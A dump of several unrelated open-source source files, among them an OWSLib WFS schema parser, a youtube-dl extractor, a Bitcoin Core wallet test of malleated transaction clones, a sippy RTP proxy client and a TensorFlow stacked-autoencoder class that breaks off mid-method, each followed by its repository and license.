if hasattr(root, "nsmap"):
nsmap = root.nsmap
return _construct_schema(elements, nsmap)
def _get_elements(complex_type, root):
"""Get attribute elements
"""
found_elements = []
element = findall(
root,
"{%s}complexType" % XS_NAMESPACE,
attribute_name="name",
attribute_value=complex_type,
)[0]
found_elements = findall(element, "{%s}element" % XS_NAMESPACE)
return found_elements
def _construct_schema(elements, nsmap):
"""Consruct fiona schema based on given elements
    :param list elements: list of schema Element objects
:param dict nsmap: namespace map
:return dict: schema
"""
if elements is None:
return None
schema = {"properties": {}, "required": [], "geometry": None}
schema_key = None
gml_key = None
# if nsmap is defined, use it
if nsmap:
for key in nsmap:
if nsmap[key] == XS_NAMESPACE:
schema_key = key
if nsmap[key] in GML_NAMESPACES:
gml_key = key
# if no nsmap is defined, we have to guess
else:
gml_key = "gml"
schema_key = "xsd"
mappings = {
"PointPropertyType": "Point",
"PolygonPropertyType": "Polygon",
"LineStringPropertyType": "LineString",
"MultiPointPropertyType": "MultiPoint",
"MultiLineStringPropertyType": "MultiLineString",
"MultiPolygonPropertyType": "MultiPolygon",
"MultiGeometryPropertyType": "MultiGeometry",
"GeometryPropertyType": "GeometryCollection",
"SurfacePropertyType": "3D Polygon",
"MultiSurfacePropertyType": "3D MultiPolygon",
}
for element in elements:
data_type = element.attrib["type"].replace(gml_key + ":", "")
name = element.attrib["name"]
non_nillable = element.attrib.get("nillable", "false") == "false"
if data_type in mappings:
schema["geometry"] = mappings[data_type]
schema["geometry_column"] = name
else:
if schema_key is not None:
schema["properties"][name] = data_type.replace(schema_key + ":", "")
if non_nillable:
schema["required"].append(name)
if schema["properties"] or schema["geometry"]:
return schema
else:
return None
def _get_describefeaturetype_url(url, version, typename):
"""Get url for describefeaturetype request
:return str: url
"""
query_string = []
if url.find("?") != -1:
query_string = parse_qsl(url.split("?")[1])
params = [x[0] for x in query_string]
if "service" not in params:
query_string.append(("service", "WFS"))
if "request" not in params:
query_string.append(("request", "DescribeFeatureType"))
if "version" not in params:
query_string.append(("version", version))
query_string.append(("typeName", typename))
urlqs = urlencode(tuple(query_string))
return url.split("?")[0] + "?" + urlqs
def _get_remote_describefeaturetype(url, timeout, headers, auth):
"""Gets the DescribeFeatureType response from the remote server.
:param str url: url of the service
:param int timeout: request timeout
:param Authentication auth: instance of owslib.util.Authentication
:return etree.Element with the root of the DescribeFeatureType response
"""
res = openURL(url, timeout=timeout, headers=headers, auth=auth)
return etree.fromstring(res.read())
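# Illustrative usage sketch (not part of the original OWSLib module); the WFS
# endpoint URL and type name below are placeholders, not a known live service.
if __name__ == "__main__":
    layer_schema = get_schema(
        "https://example.org/geoserver/wfs",  # hypothetical endpoint
        "ns:layer_name", version="1.1.0")
    # Expected shape: {'properties': {...}, 'required': [...],
    #                  'geometry': 'Point', 'geometry_column': 'geom'}
    print(layer_schema)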
| bsd-3-clause |
steebchen/youtube-dl | youtube_dl/extractor/cliprs.py | 81 | 1030 | # coding: utf-8
from __future__ import unicode_literals
from .onet import OnetBaseIE
class ClipRsIE(OnetBaseIE):
_VALID_URL = r'https?://(?:www\.)?clip\.rs/(?P<id>[^/]+)/\d+'
_TEST = {
'url': 'http://www.clip.rs/premijera-frajle-predstavljaju-novi-spot-za-pesmu-moli-me-moli/3732',
'md5': 'c412d57815ba07b56f9edc7b5d6a14e5',
'info_dict': {
'id': '1488842.1399140381',
'ext': 'mp4',
'title': 'PREMIJERA Frajle predstavljaju novi spot za pesmu Moli me, moli',
'description': 'md5:56ce2c3b4ab31c5a2e0b17cb9a453026',
'duration': 229,
'timestamp': 1459850243,
'upload_date': '20160405',
}
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
mvp_id = self._search_mvp_id(webpage)
info_dict = self._extract_from_id(mvp_id, webpage)
info_dict['display_id'] = display_id
return info_dict
| unlicense |
VcamX/grpc | src/python/grpcio/tests/unit/_junkdrawer/__init__.py | 1496 | 1530 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| bsd-3-clause |
Abhinav117/pymtl | accel/strsearch/StrSearchOO.py | 7 | 2441 | #=========================================================================
# StrSearchOO.py
#=========================================================================
#-------------------------------------------------------------------------
# StrSearchMath
#-------------------------------------------------------------------------
# Simple python string searcher.
class StrSearchMath( object ):
#-----------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------
def __init__( self, string ):
self.string = string
#-----------------------------------------------------------------------
# find
#-----------------------------------------------------------------------
def find( self, doc ):
return self.string in doc
#-------------------------------------------------------------------------
# StrSearchAlg
#-------------------------------------------------------------------------
# Knuth-Morris-Pratt algorithm.
class StrSearchAlg( object ):
#-----------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------
def __init__( self, string ):
self.re = re = string
self.DFA = DFA = (len(re) + 1) * [0]
# build the deterministic finite-state automaton
i = 0
DFA[0] = -1
while i < len(re):
DFA[i+1] = DFA[i] + 1
while (DFA[i+1] > 0 and re[i] != re[DFA[i+1] - 1]):
DFA[i+1] = DFA[DFA[i+1] - 1] + 1
i+=1
#-----------------------------------------------------------------------
  # find
#-----------------------------------------------------------------------
def find( self, doc ):
index = 0
j = 0
while j < len(doc):
# if character not a match, rewind the DFA
#while (index > 0 and doc[j] != re[index]):
if (index > 0 and doc[j] != self.re[index]):
index = self.DFA[index]
# check if this character matches our current search
if (doc[j] == self.re[index]):
index += 1
# we found a match! now check for overlapping matches
if index == (len(self.re)):
index = self.DFA[index]
#print ("FOUND: "+doc[:j+1-len(self.re)]+"|"
# +doc[j+1-len(self.re):j+1]+"|"+doc[j+1:])
return True
# increment the doc indice
j += 1
return False
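#-------------------------------------------------------------------------
# minimal self-check
#-------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original file): both searchers
# expose the same find() interface over a document string.
if __name__ == '__main__':
  assert StrSearchMath( 'needle' ).find( 'find the needle here' )
  assert StrSearchAlg ( 'needle' ).find( 'find the needle here' )
  assert not StrSearchAlg( 'needle' ).find( 'nothing to see' )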
| bsd-3-clause |
shingonoide/odoo | addons/point_of_sale/report/pos_invoice.py | 317 | 2393 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class PosInvoiceReport(osv.AbstractModel):
_name = 'report.point_of_sale.report_invoice'
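    # Proxy report: resolves the selected pos.order ids to their linked account
    # invoices and renders them through the stock account.report_invoice
    # template; any selected order without an invoice_id aborts with an error.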
def render_html(self, cr, uid, ids, data=None, context=None):
report_obj = self.pool['report']
posorder_obj = self.pool['pos.order']
report = report_obj._get_report_from_name(cr, uid, 'account.report_invoice')
selected_orders = posorder_obj.browse(cr, uid, ids, context=context)
ids_to_print = []
invoiced_posorders_ids = []
for order in selected_orders:
if order.invoice_id:
ids_to_print.append(order.invoice_id.id)
invoiced_posorders_ids.append(order.id)
not_invoiced_orders_ids = list(set(ids) - set(invoiced_posorders_ids))
if not_invoiced_orders_ids:
not_invoiced_posorders = posorder_obj.browse(cr, uid, not_invoiced_orders_ids, context=context)
not_invoiced_orders_names = list(map(lambda a: a.name, not_invoiced_posorders))
raise osv.except_osv(_('Error!'), _('No link to an invoice for %s.' % ', '.join(not_invoiced_orders_names)))
docargs = {
'doc_ids': ids_to_print,
'doc_model': report.model,
'docs': selected_orders,
}
return report_obj.render(cr, uid, ids, 'account.report_invoice', docargs, context=context)
| agpl-3.0 |
daliwangi/bitcoin | test/functional/txn_clone.py | 32 | 7658 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there are cloned transactions with malleated scriptsigs."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class TxnMallTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
super(TxnMallTest, self).setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 BTC serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
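        # (4-byte version + 1-byte input count + 36-byte outpoint + 1-byte
        # empty-scriptSig stub + 4-byte sequence + 1-byte output count,
        # doubled because the raw transaction is hex encoded)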
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
| mit |
jevonearth/rtpproxy | python/sippy_lite/sippy/Rtp_proxy_client.py | 2 | 10170 | # Copyright (c) 2003-2005 Maxim Sobolev. All rights reserved.
# Copyright (c) 2006-2014 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from Timeout import TimeoutInact
from Rtp_proxy_client_udp import Rtp_proxy_client_udp
from Rtp_proxy_client_stream import Rtp_proxy_client_stream
import socket
CAPSTABLE = {'20071218':'copy_supported', '20080403':'stat_supported', \
'20081224':'tnot_supported', '20090810':'sbind_supported', \
'20150617':'wdnt_supported'}
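# Each protocol version above is probed with a "VF <version>" query by
# Rtpp_caps_checker below; a "1" reply sets the mapped *_supported attribute
# on the client, and caps_done flips once all answers have arrived.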
class Rtpp_caps_checker(object):
caps_requested = 0
caps_received = 0
rtpc = None
def __init__(self, rtpc):
self.rtpc = rtpc
rtpc.caps_done = False
for vers in CAPSTABLE.iterkeys():
self.caps_requested += 1
rtpc.send_command('VF %s' % vers, self.caps_query_done, vers)
def caps_query_done(self, result, vers):
self.caps_received += 1
vname = CAPSTABLE[vers]
if result == '1':
setattr(self.rtpc, vname, True)
else:
setattr(self.rtpc, vname, False)
if self.caps_received == self.caps_requested:
self.rtpc.caps_done = True
self.rtpc.go_online()
self.rtpc = None
class Rtp_proxy_client(Rtp_proxy_client_udp, Rtp_proxy_client_stream):
worker = None
address = None
online = False
copy_supported = False
stat_supported = False
tnot_supported = False
sbind_supported = False
wdnt_supported = False
shut_down = False
proxy_address = None
caps_done = False
sessions_created = None
active_sessions = None
active_streams = None
preceived = None
ptransmitted = None
hrtb_ival = 10.0
hrtb_retr_ival = 60.0
rtpp_class = None
def __init__(self, global_config, *address, **kwargs):
#print 'Rtp_proxy_client', address
no_version_check = False
if kwargs.has_key('no_version_check'):
no_version_check = kwargs['no_version_check']
del kwargs['no_version_check']
if len(address) == 0 and kwargs.has_key('spath'):
a = kwargs['spath']
del kwargs['spath']
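            # Accepted spath formats: udp:host[:port], udp6:host[:port],
            # tcp:host[:port], tcp6:host[:port], unix:/path or cunix:/path;
            # the default control port is 22222.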
if a.startswith('udp:'):
a = a.split(':', 2)
if len(a) == 2:
rtppa = (a[1], 22222)
else:
rtppa = (a[1], int(a[2]))
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET
self.rtpp_class = Rtp_proxy_client_udp
elif a.startswith('udp6:'):
proto, a = a.split(':', 1)
if not a.endswith(']'):
a = a.rsplit(':', 1)
if len(a) == 1:
rtp_proxy_host, rtp_proxy_port = a[0], 22222
else:
rtp_proxy_host, rtp_proxy_port = (a[0], int(a[1]))
else:
rtp_proxy_host, rtp_proxy_port = a, 22222
if not rtp_proxy_host.startswith('['):
rtp_proxy_host = '[%s]' % rtp_proxy_host
rtppa = (rtp_proxy_host, rtp_proxy_port)
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET6
self.rtpp_class = Rtp_proxy_client_udp
elif a.startswith('tcp:'):
a = a.split(':', 2)
if len(a) == 2:
rtppa = (a[1], 22222)
else:
rtppa = (a[1], int(a[2]))
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET
self.rtpp_class = Rtp_proxy_client_stream
elif a.startswith('tcp6:'):
proto, a = a.split(':', 1)
if not a.endswith(']'):
a = a.rsplit(':', 1)
if len(a) == 1:
rtp_proxy_host, rtp_proxy_port = a[0], 22222
else:
rtp_proxy_host, rtp_proxy_port = (a[0], int(a[1]))
else:
rtp_proxy_host, rtp_proxy_port = a, 22222
if not rtp_proxy_host.startswith('['):
rtp_proxy_host = '[%s]' % rtp_proxy_host
rtppa = (rtp_proxy_host, rtp_proxy_port)
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET6
self.rtpp_class = Rtp_proxy_client_stream
else:
if a.startswith('unix:'):
rtppa = a[5:]
elif a.startswith('cunix:'):
rtppa = a[6:]
else:
rtppa = a
self.proxy_address = global_config['_sip_address']
kwargs['family'] = socket.AF_UNIX
self.rtpp_class = Rtp_proxy_client_stream
self.rtpp_class.__init__(self, global_config, rtppa, **kwargs)
elif len(address) > 0 and type(address[0]) in (tuple, list):
self.rtpp_class = Rtp_proxy_client_udp
self.proxy_address = address[0][0]
Rtp_proxy_client_udp.__init__(self, global_config, *address, \
**kwargs)
else:
self.rtpp_class = Rtp_proxy_client_stream
self.proxy_address = global_config['_sip_address']
Rtp_proxy_client_stream.__init__(self, global_config, *address, \
**kwargs)
if not no_version_check:
self.version_check()
else:
self.caps_done = True
self.online = True
def send_command(self, *args, **kwargs):
self.rtpp_class.send_command(self, *args, **kwargs)
def reconnect(self, *args, **kwargs):
self.rtpp_class.reconnect(self, *args, **kwargs)
def version_check(self):
if self.shut_down:
return
self.send_command('V', self.version_check_reply)
def version_check_reply(self, version):
if self.shut_down:
return
if version == '20040107':
self.go_online()
elif self.online:
self.go_offline()
else:
to = TimeoutInact(self.version_check, self.hrtb_retr_ival)
to.spread_runs(0.1)
to.go()
def heartbeat(self):
#print 'heartbeat', self, self.address
if self.shut_down:
return
self.send_command('Ib', self.heartbeat_reply)
def heartbeat_reply(self, stats):
#print 'heartbeat_reply', self.address, stats, self.online
if self.shut_down:
return
if not self.online:
return
if stats == None:
self.active_sessions = None
self.go_offline()
else:
sessions_created = active_sessions = active_streams = preceived = ptransmitted = 0
for line in stats.splitlines():
line_parts = line.split(':', 1)
if line_parts[0] == 'sessions created':
sessions_created = int(line_parts[1])
elif line_parts[0] == 'active sessions':
active_sessions = int(line_parts[1])
elif line_parts[0] == 'active streams':
active_streams = int(line_parts[1])
elif line_parts[0] == 'packets received':
preceived = int(line_parts[1])
elif line_parts[0] == 'packets transmitted':
ptransmitted = int(line_parts[1])
self.update_active(active_sessions, sessions_created, active_streams, preceived, ptransmitted)
to = TimeoutInact(self.heartbeat, self.hrtb_ival)
to.spread_runs(0.1)
to.go()
def go_online(self):
if self.shut_down:
return
if not self.online:
if not self.caps_done:
rtpp_cc = Rtpp_caps_checker(self)
return
self.online = True
self.heartbeat()
def go_offline(self):
if self.shut_down:
return
#print 'go_offline', self.address, self.online
if self.online:
self.online = False
to = TimeoutInact(self.version_check, self.hrtb_retr_ival)
to.spread_runs(0.1)
to.go()
def update_active(self, active_sessions, sessions_created, active_streams, preceived, ptransmitted):
self.sessions_created = sessions_created
self.active_sessions = active_sessions
self.active_streams = active_streams
self.preceived = preceived
self.ptransmitted = ptransmitted
def shutdown(self):
if self.shut_down: # do not crash when shutdown() called twice
return
self.shut_down = True
self.rtpp_class.shutdown(self)
self.rtpp_class = None
def get_rtpc_delay(self):
return self.rtpp_class.get_rtpc_delay(self)
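# --- Illustrative note (not part of the original module) ---
# The 'spath' keyword accepted by Rtp_proxy_client.__init__ selects the control
# transport from its prefix. The addresses below are examples only, assuming a
# sippy global_config dict 'gc' that provides '_sip_address' for UNIX sockets:
#   Rtp_proxy_client(gc, spath='udp:127.0.0.1:22222')           # IPv4 UDP control socket
#   Rtp_proxy_client(gc, spath='tcp6:[::1]:22222')              # IPv6 TCP control socket
#   Rtp_proxy_client(gc, spath='unix:/var/run/rtpproxy.sock')   # local UNIX socket
# When no port is given, 22222 is assumed; a plain path without a prefix is
# treated as a UNIX socket path as well.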
| bsd-2-clause |
TinghuiWang/pyActLearn | pyActLearn/learning/nn/sda.py | 1 | 15121 | import logging
import numpy as np
import tensorflow as tf
from .layers import AutoencoderLayer, HiddenLayer, SoftmaxLayer
from .injectors import BatchInjector
from .criterion import MonitorBased, ConstIterations
logger = logging.getLogger(__name__)
class SDA:
"""Stacked Auto-encoder
Args:
num_features (:obj:`int`): Number of features.
num_classes (:obj:`int`): Number of classes.
layers (:obj:`list` of :obj:`int`): Series of hidden auto-encoder layers.
encode_optimizer: Optimizer used for auto-encoding process.
tuning_optimizer: Optimizer used for fine tuning.
Attributes:
num_features (:obj:`int`): Number of features.
num_classes (:obj:`int`): Number of classes.
x (:obj:`tensorflow.placeholder`): Input placeholder.
y_ (:obj:`tensorflow.placeholder`): Output placeholder.
inner_layers (:obj:`list`): List of auto-encoder hidden layers.
"""
def __init__(self, num_features, num_classes, layers, encode_optimizer=None, tuning_optimizer=None):
self.num_features = num_features
self.num_classes = num_classes
with tf.name_scope('input'):
self.x = tf.placeholder(tf.float32, shape=[None, num_features], name='input_x')
self.y_ = tf.placeholder(tf.float32, shape=[None, num_classes], name='input_y')
self.inner_layers = []
self.summaries = []
self.encode_opts = []
if encode_optimizer is None:
self.encode_optimizer = tf.train.AdamOptimizer()
else:
self.encode_optimizer = encode_optimizer
if tuning_optimizer is None:
self.tuning_optimizer = tf.train.AdamOptimizer()
else:
self.tuning_optimizer = tuning_optimizer
# Create Layers
for i in range(len(layers)):
if i == 0:
# First Layer
self.inner_layers.append(
AutoencoderLayer(num_features, layers[i], x=self.x, name=('Hidden%d' % i))
)
else:
# inner Layer
self.inner_layers.append(
AutoencoderLayer(layers[i-1], layers[i], x=self.inner_layers[i-1].y, name=('Hidden%d' % i))
)
self.summaries += self.inner_layers[i].summaries
self.encode_opts.append(
self.encode_optimizer.minimize(self.inner_layers[i].encode_loss,
var_list=self.inner_layers[i].variables)
)
if num_classes == 1:
# Output Layers
self.output_layer = HiddenLayer(layers[len(layers) - 1], num_classes, x=self.inner_layers[len(layers)-1].y,
name='Output', activation_fn=tf.sigmoid)
# Predicted Probability
self.y = self.output_layer.y
self.y_class = tf.cast(tf.greater_equal(self.y, 0.5), tf.float32)
# Loss
self.loss = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(self.output_layer.logits, self.y_,
name='SigmoidCrossEntropyLoss')
)
self.correct_prediction = tf.equal(self.y_class, self.y_)
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))
else:
# Output Layers
self.output_layer = SoftmaxLayer(layers[len(layers) - 1], num_classes, x=self.inner_layers[len(layers)-1].y,
name='OutputLayer')
# Predicted Probability
self.y = self.output_layer.y
self.y_class = tf.argmax(self.y, 1)
# Loss
self.loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(logits=self.output_layer.logits, labels=self.y_,
name='SoftmaxCrossEntropyLoss')
)
self.correct_prediction = tf.equal(self.y_class, tf.argmax(self.y_, 1))
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))
self.summaries.append(tf.summary.scalar('cross_entropy', self.loss))
self.summaries.append(tf.summary.scalar('accuracy', self.accuracy))
self.summaries += self.output_layer.summaries
with tf.name_scope('train'):
self.fine_tuning = self.tuning_optimizer.minimize(self.loss)
self.merged = tf.summary.merge(self.summaries)
self.sess = None
def fit(self, x, y, batch_size=100,
pretrain_iter_num=100, pretrain_criterion='const_iterations',
tuning_iter_num=100, tuning_criterion='const_iterations',
summaries_dir=None, test_x=None, test_y=None, summary_interval=10,
session=None):
"""Fit the model to the dataset
Args:
x (:obj:`numpy.ndarray`): Input features of shape (num_samples, num_features).
y (:obj:`numpy.ndarray`): Corresponding Labels of shape (num_samples) for binary classification,
or (num_samples, num_classes) for multi-class classification.
batch_size (:obj:`int`): Batch size used in gradient descent.
pretrain_iter_num (:obj:`int`): Number of const iterations or search depth for monitor based stopping
criterion in pre-training stage
pretrain_criterion (:obj:`str`): Stopping criteria in pre-training stage ('const_iterations' or
'monitor_based')
tuning_iter_num (:obj:`int`): Number of const iterations or search depth for monitor based stopping
criterion in fine-tuning stage
tuning_criterion (:obj:`str`): Stopping criteria in fine-tuning stage ('const_iterations' or
'monitor_based')
summaries_dir (:obj:`str`): Path of the directory to store summaries and saved values.
summary_interval (:obj:`int`): The step interval to export variable summaries.
test_x (:obj:`numpy.ndarray`): Test feature array used for monitoring training progress.
            test_y (:obj:`numpy.ndarray`): Test label array used for monitoring training progress.
session (:obj:`tensorflow.Session`): Session to run training functions.
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
session.run(tf.global_variables_initializer())
# Pre-training stage: layer by layer
for j in range(len(self.inner_layers)):
current_layer = self.inner_layers[j]
if summaries_dir is not None:
layer_summaries_dir = '%s/pretrain_layer%d' % (summaries_dir, j)
train_writer = tf.summary.FileWriter(layer_summaries_dir + '/train')
test_writer = tf.summary.FileWriter(layer_summaries_dir + '/test')
valid_writer = tf.summary.FileWriter(layer_summaries_dir + '/valid')
# Get Stopping Criterion
if pretrain_criterion == 'const_iterations':
_pretrain_criterion = ConstIterations(num_iters=pretrain_iter_num)
train_x = x
train_y = y
elif pretrain_criterion == 'monitor_based':
num_samples = x.shape[0]
valid_set_len = int(1 / 5 * num_samples)
valid_x = x[num_samples - valid_set_len:num_samples, :]
valid_y = y[num_samples - valid_set_len:num_samples, :]
train_x = x[0:num_samples - valid_set_len, :]
